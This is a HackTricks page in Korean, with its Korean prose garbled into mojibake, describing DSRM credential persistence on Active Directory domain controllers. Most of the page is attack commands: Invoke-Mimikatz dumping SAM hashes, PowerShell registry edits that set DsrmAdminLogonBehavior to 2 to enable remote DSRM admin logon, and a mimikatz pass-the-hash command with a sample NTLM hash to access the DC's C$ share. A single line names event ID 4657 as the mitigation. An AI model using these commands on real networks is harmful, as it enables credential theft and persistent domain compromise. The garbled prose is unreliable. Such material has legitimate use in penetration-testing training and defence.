Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

DSRM ์ž๊ฒฉ ์ฆ๋ช…

๊ฐ DC์—๋Š” ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ๊ณ„์ •์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋จธ์‹ ์—์„œ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์„ ๊ฐ€์ง€๋ฉด mimikatz๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ํ•ด์‹œ๋ฅผ ๋คํ”„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ์ˆ˜์ •ํ•˜์—ฌ ์ด ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํ™œ์„ฑํ™”ํ•˜์—ฌ ์ด ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ์‚ฌ์šฉ์ž์— ์›๊ฒฉ์œผ๋กœ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๋จผ์ € DC ๋‚ด์˜ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ์‚ฌ์šฉ์ž ํ•ด์‹œ๋ฅผ ๋คํ”„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

๊ทธ๋Ÿฐ ๋‹ค์Œ ํ•ด๋‹น ๊ณ„์ •์ด ์ž‘๋™ํ•˜๋Š”์ง€ ํ™•์ธํ•ด์•ผ ํ•˜๋ฉฐ, ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์˜ ๊ฐ’์ด โ€œ0โ€œ์ด๊ฑฐ๋‚˜ ์กด์žฌํ•˜์ง€ ์•Š์œผ๋ฉด โ€œ2โ€œ๋กœ ์„ค์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

๊ทธ๋Ÿฐ ๋‹ค์Œ, PTH๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ C$์˜ ๋‚ด์šฉ์„ ๋‚˜์—ดํ•˜๊ฑฐ๋‚˜ ์‹ฌ์ง€์–ด ์…ธ์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ฉ”๋ชจ๋ฆฌ์— ์žˆ๋Š” ํ•ด๋‹น ํ•ด์‹œ๋กœ ์ƒˆ PowerShell ์„ธ์…˜์„ ์ƒ์„ฑํ•  ๋•Œ (PTH์˜ ๊ฒฝ์šฐ) ์‚ฌ์šฉ๋˜๋Š” โ€œ๋„๋ฉ”์ธโ€œ์€ DC ๋จธ์‹ ์˜ ์ด๋ฆ„์ผ ๋ฟ์ž…๋‹ˆ๋‹ค:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

๋” ๋งŽ์€ ์ •๋ณด๋Š” ๋‹ค์Œ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: https://adsecurity.org/?p=1714 ๋ฐ https://adsecurity.org/?p=1785

์™„ํ™”

  • ์ด๋ฒคํŠธ ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior์˜ ๊ฐ์‚ฌ ์ƒ์„ฑ/๋ณ€๊ฒฝ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ